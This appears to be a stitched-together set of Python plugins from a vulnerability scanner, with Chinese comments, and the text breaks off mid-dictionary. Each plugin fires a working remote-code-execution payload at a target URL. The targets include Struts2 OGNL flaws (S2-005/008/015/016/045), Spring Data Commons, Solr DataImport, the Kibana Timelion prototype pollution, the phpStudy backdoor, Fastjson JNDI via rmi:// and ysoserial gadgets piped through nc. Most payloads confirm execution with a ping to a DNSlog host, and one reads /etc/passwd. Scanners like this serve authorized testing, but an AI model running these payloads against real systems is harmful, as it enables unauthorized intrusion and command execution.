def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL=Dnslog()
con=""
payload="""%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ping%20{}%27%29.getInputStream%28%29%29%2C%23q%7D.action""".format(DL.dns_host())
try:
payload_url = url+payload
try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-015)\r\n漏洞详情:\r\n版本号:S2-015\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL=Dnslog()
data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()
payload ="/users?page=&size=5"
payload_url = scheme + "://" + url + ":" + str(port) + payload
Headers["Content-Type"]="application/x-www-form-urlencoded"
Headers["Referer"]=payload_url
resp = requests.post(payload_url,data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL=Dnslog()
data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()
payload ="/users?page=&size=5"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Referer":payload_url
}
resp = requests.post(payload_url,data=data, headers=headers, proxies=proxies, timeout=6, verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringDataCommons远程命令执行漏洞\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
print(Medusa)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port,path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL=Dnslog()
con=""
try:
payload_url = scheme + "://" + url +":"+ str(port)+path
Headers["Content-Type"]="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping "+DL.dns_host()+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,headers,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url=kwargs.get("Url")#获取传入的url参数
Headers=kwargs.get("Headers")#获取传入的头文件
proxies=kwargs.get("Proxies")#获取传入的代理参数
try:
payload_url=url+'/solr/admin/cores'
step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json"
payload_url = url+ payload
Headers['Accept'] ='application/json'
Headers["Content-Type"] ="application/x-www-form-urlencoded"
Headers["X-Requested-With"]="XMLHttpRequest"
DL = Dnslog() # 初始化DNSlog
#POC没问题DNSlog有问题
# DL="p61rpm.dnslog.cn"
data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core="+name+"&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host())
resp = requests.post(payload_url,data=data2,headers=Headers, proxies=proxies,timeout=6, verify=False)
if DL.result():
Medusa = "{}存在Solr远程代码执行漏洞(CVE-2019-0193)\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
dns = Dnslog()
os.system(
'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(
Ysoserial().result(), dns.dns_host(), url, port))
if dns.result():
Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(
url, scheme + "://" + url + ":" + str(port))
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
DL=Dnslog()
data="""username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping+%s")]=xxx"""%DL.dns_host()
payload ="/users?page=&size=5"
payload_url = url + payload
Headers["Content-Type"]="application/x-www-form-urlencoded"
Headers["Referer"]=payload_url
resp = requests.post(payload_url,data=data, headers=Headers, proxies=proxies, timeout=6, verify=False)
time.sleep(4)
if DL.result():
Medusa = "{}存在SpringDataCommons远程命令执行漏洞(CVE-2018-1273)\r\n验证数据:\r\n返回内容:{}\r\nDnsLog:{}\r\nDnsLog数据:{}\r\n".format(url,resp.text, DL.dns_host(), str( DL.dns_text()))
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
DL=Dnslog()
payload_url1 = url + "/api/timelion/run"
payload_url2 =url + '/app/canvas'
payload_post = '''{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping %s\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],"time":{"from":"now-15m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}''' % DL.dns_host()
Headers['Content-Type']='application/json;charset=utf-8'
Headers['Referer']=url+'/app/timelion'
Headers['Accept']='application/json, text/plain, */*'
Headers['Accept-Language']='zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
resp = requests.post(payload_url1, headers=Headers,proxies=proxies, data=payload_post, timeout=5, verify=False)
resp2 = requests.get(payload_url2, headers=Headers,proxies=proxies, timeout=5, verify=False)
if DL.result():
Medusa = "{} 存在Kibana远程命令执行漏洞(CVE-2019-7609)\r\n 验证数据:\r\n漏洞位置:{}\r\nDNSlog内容:{}\r\n".format(url,
payload_url1,
DL.dns_host(),)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp2,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL=Dnslog()
payload_url1 = scheme + '://' + url + ':' + str(port) + "/api/timelion/run"
payload_url2 = scheme + '://' + url + ':' + str(port) + '/app/canvas'
payload_post = '''{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"ping %s\");process.exit()//')\n.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],"time":{"from":"now-15m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}''' % DL.dns_host()
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json;charset=utf-8',
'Referer': scheme+'://'+url+':'+str(port)+'/app/timelion',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
}
resp = requests.post(payload_url1, headers=headers,proxies=proxies, data=payload_post, timeout=5, verify=False)
resp2 = requests.get(payload_url2, headers=headers,proxies=proxies, timeout=5, verify=False)
if DL.result():
Medusa = "{}存在Kibana远程命令执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nDNSlog内容:{}\r\n".format(url,
payload_url1,
DL.dns_host(),)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies = Proxies().result(proxies)
scheme, url, port ,path= UrlProcessing().result(Url)#这个系列的洞需要用到路径
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL=Dnslog()
linux_payload ="?(%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003dfalse%27)(bla)(bla)&(%27%5cu0023_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue%27)(bla)(bla)&(%27%5cu0023mycmd%5cu003d%5c%27cat+/etc/passwd%5c%27%27)(bla)(bla)&(%27%5cu0023myret%[email protected]@getRuntime().exec(%5cu0023mycmd)%27)(bla)(bla)&(A)((%27%5cu0023mydat%5cu003dnew%5c40java.io.DataInputStream(%5cu0023myret.getInputStream())%27)(bla))&(B)((%27%5cu0023myres%5cu003dnew%5c40byte[51020]%27)(bla))&(C)((%27%5cu0023mydat.readFully(%5cu0023myres)%27)(bla))&(D)((%27%5cu0023mystr%5cu003dnew%5c40java.lang.String(%5cu0023myres)%27)(bla))&(%27%5cu0023myout%[email protected]@getResponse()%27)(bla)(bla)&(E)((%27%5cu0023myout.getWriter().println(%5cu0023mystr)%27)(bla))"
windows_payload="?(%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003dfalse%27)(bla)(bla)&(%27%5cu0023_memberAccess.excludeProperties%[email protected]@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27%5cu0023_memberAccess.allowStaticMethodAccess%5cu003dtrue%27)(bla)(bla)&(%27%5cu0023mycmd%5cu003d%5c%27ping+{}%5c%27%27)(bla)(bla)&(%27%5cu0023myret%[email protected]@getRuntime().exec(%5cu0023mycmd)%27)(bla)(bla)&(A)((%27%5cu0023mydat%5cu003dnew%5c40java.io.DataInputStream(%5cu0023myret.getInputStream())%27)(bla))&(B)((%27%5cu0023myres%5cu003dnew%5c40byte[51020]%27)(bla))&(C)((%27%5cu0023mydat.readFully(%5cu0023myres)%27)(bla))&(D)((%27%5cu0023mystr%5cu003dnew%5c40java.lang.String(%5cu0023myres)%27)(bla))&(%27%5cu0023myout%[email protected]@getResponse()%27)(bla)(bla)&(E)((%27%5cu0023myout.getWriter().println(%5cu0023mystr)%27)(bla))".format(DL.dns_host())
for payload in [linux_payload,windows_payload]:
try:
payload_url = scheme + "://" + url + ":" + str(port) + path + payload
resp=requests.get(payload_url,headers=Headers, proxies=proxies,timeout=5, verify=False)
code=resp.status_code
con=resp.text
if (code == 200 and con.find('root:')!=-1 and con.find('/bin/bash')!=-1 and con.find('bin:')!=-1) or DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-005)\r\n漏洞详情:\r\n影响版本:2.0.0-2.1.8.1\r\nPayload:{}\r\n返回执行内容:{}\r\n".format(url, payload_url,con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,e) # 调用写入类传入URL和错误插件名og().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
dns = Dnslog()
os.system(
'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(
Ysoserial().result(), dns.dns_host(), url, port))
if dns.result():
Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(
url, scheme + "://" + url + ":" + str(port))
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port,path = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
DL=Dnslog()
payload="""?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@getRuntime%28%29.exec%28%22ping%20{}%22%29)""".format(DL.dns_host())
try:
payload_url = scheme + "://" + url +":"+ str(port)+path+payload
resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
time.sleep(3)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-008)\r\n漏洞详情:\r\n版本号:S2-008\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL=Dnslog()
payload = "/index.php"
commandS = ('''system("ping {}");''').format(DL.dns_host())
cmd = base64.b64encode(commandS.encode('utf-8'))
try:
payload_url = url+payload
Headers['Sec-Fetch-Mode']='navigate'
Headers['Sec-Fetch-User']='******'
Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'
Headers['Sec-Fetch-Site']='none'
Headers['accept-charset']=cmd
resp = requests.get(payload_url,headers=Headers, timeout=5, proxies=proxies,verify=False)
time.sleep(2)
if DL.result():
Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(url, payload_url,Headers,DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
if proxies!=None:
proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies)
socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理
socket.socket = socks.socksocket # 把代理应用到socket
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL=Dnslog()
JrmpPort = "2000"#端口随便
JrmpClient = "JRMPClient"
YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10)
con,payload=exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient,TempPath)
time.sleep(5)
if DL.result():
Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(url,payload,con,DL.dns_host(),DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL=Dnslog()
con=""
payload="""?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(DL.dns_host())
try:
payload_url = url+payload
try:#防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None:
url=kwargs.get("Url")#获取传入的url参数
Headers=kwargs.get("Headers")#获取传入的头文件
proxies=kwargs.get("Proxies")#获取传入的代理参数
try:
payload_url = url
DL=Dnslog()
data = {
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://" + DL.dns_host() + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
Headers['Content-Type']='application/json'
Headers["Connection"]="close"
resp = requests.post(payload_url, headers=Headers, data=data,proxies=proxies, timeout=10, verify=False)
if DL.result() and resp.status_code==500:
Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format(url,
payload_url,
resp.text,DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload_url = scheme + "://" + url + ":" + str(
port) + '/solr/admin/cores'
step1 = requests.get(payload_url, timeout=6, headers=headers).text
data = json.loads(step1)
if 'status' in data:
name = ''
for x in data['status']:
name = x
payload = "/solr/" + name + "/dataimport?_=1582117587113&indent=on&wt=json"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'application/json',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"
}
DL = Dnslog() # 初始化DNSlog
#POC没问题DNSlog有问题
# DL="p61rpm.dnslog.cn"
data2 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(
DL.dns_host())
resp = requests.post(payload_url,
data=data2,
headers=headers,
timeout=20,
verify=False)
if DL.result():
Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(
url, payload_url, data2)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + '://' + url + ':' + str(port)
DL = Dnslog()
# DL="777777777777.h3me6i.dnslog.cn"
data = '''{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://%s/Exploit",
"autoCommit": true
}
}
''' % DL.dns_host()
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/json',
'Accept-Language':
